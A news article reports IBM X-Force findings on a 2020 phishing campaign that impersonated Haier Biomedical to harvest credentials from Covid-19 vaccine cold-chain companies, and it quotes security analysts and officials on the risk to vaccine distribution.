Since the Covid-19 pandemic began, hackers and scammers have focused extraordinary attention on it, whether for espionage or for grift. Now, as pharmaceutical companies prepare to ship long-awaited vaccines, a new round of sophisticated phishing attacks is focused on the complex supply chain that will get them to people in need.
Two of the leading Covid-19 vaccine candidates, by Pfizer and Moderna, have been submitted to the FDA for emergency authorization; the agency is scheduled to evaluate Pfizer's application on December 10, and Moderna's one week later. UK regulators approved Pfizer’s vaccine on Wednesday. Which means that the next challenge for both vaccines is transporting them. They must be kept at frigid temperatures—minus 4 degrees Fahrenheit for Moderna, and 94 degrees below for Pfizer—requiring a network of specialists known as the “cold chain.” Today, security researchers at IBM are releasing findings that a campaign has for months targeted a significant number of those companies, across six different countries.
“This activity took place in September, which means that someone’s looking to get ahead, looking to be where they need to be at the critical moment,” says Claire Zaboeva, senior cyber threat analyst with IBM Security X-Force. “It’s the first time we’ve seen that level of pre-positioning within the context of the pandemic.”
The campaign seems to have focused on companies and organizations associated with Gavi, the Vaccine Alliance’s Cold Chain Equipment Optimization Platform, an effort to streamline and strengthen the cold chain. The only target IBM identified by name was the European Commission’s Directorate-General for Taxation and Customs Union, which among other things determines tax relief associated with transporting vaccines across borders. Seemingly any part of the cold chain was within bounds for the attackers. Other targets mentioned by IBM include manufacturers of solar panels, which might power trucks carrying the vaccine to more remote locations, and a German website developer whose clients include pharmaceutical, biotech, and container transport companies.
The attackers sent emails purporting to be from Haier Biomedical, a Chinese company that advertises itself as “the world's only complete cold chain provider,” under the guise of routine requests for quotations. The emails contained HTML attachments that asked the recipient to enter their credentials, which the hackers could then harvest to infiltrate the targeted company.
IBM says it doesn’t know if any of the attacks were successful or what the ultimate objective of the campaign might be. “The door is really open,” says Zaboeva. “Once you get the keys to the kingdom, and you’re inside the city walls or on the network, there’s a myriad of objectives that you can attain, whether it’s critical information—like timetables and distribution—or disruptive attacks.”
Read all of our coronavirus coverage here.
In a way, the attacks are simply an evolution of what Covid-19 researchers have already been facing for months. In July, officials from the US, UK, and Canada called out Russian hackers for zeroing in on vaccine development. China has also been implicated in an attempt against Moderna this summer. Just this week, The Wall Street Journal reported that apparent North Korean hackers attempted to break into nine health organizations, including pharmaceutical giants Johnson & Johnson and AstraZeneca.
The sustained cyberassault against companies and organizations working on Covid-19 research and vaccines is unsurprising, given the stakes. While not unexpected, that shift in focus to the cold chain is cause for particular concern, given the delicate and urgent nature of vaccine deployment.
“As we shift towards distributing a vaccine for Covid-19, the logistics of this operation will become extremely critical,” says John Hultquist, senior director of analysis at Mandiant Threat Intelligence. “Seemingly mundane security issues could have major repercussions to such a complex and important effort.”
Adding to the challenge is that cold-chain companies often aren’t as well equipped to defend themselves as multinational drug companies or finance firms. In mid-November, cold storage firm Americold suffered a ransomware attack—unrelated to the newly detailed phishing campaign—that knocked some of its operations offline. “We have a strong concern that as this cold chain becomes global critical infrastructure, the individual organizations involved may not be prepared with that security posture that’s really needed to protect them,” says Nick Rossmann, IBM Security X-Force’s global threat intel lead.
"Gavi has strong policies and processes in place to prevent such phishing attacks and hacking attempts," a Gavi spokesperson said in a statement. "We are working closely with our partners on security awareness to continue to strengthen these best practices."
None of the attempts IBM spotted were against US-based companies. Still, in response to the IBM report, the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency issued an alert warning organizations associated with the Operation Warp Speed vaccine initiative in the US to look out for similar attacks. "Today’s report highlights the importance of cybersecurity diligence at each step in the vaccine supply chain," CISA chief strategist for health care Josh Corman said in a statement. "CISA encourages all organizations involved in vaccine storage and transport to harden attack surfaces, particularly in cold storage operation, and remain vigilant against all activity in this space."
The logistics around the cold chain are hard enough to get right as it is. That hackers might further complicate things—or could be in a position to upend them—is a distressing possibility as the US and the rest of the world enters a critical phase of the pandemic.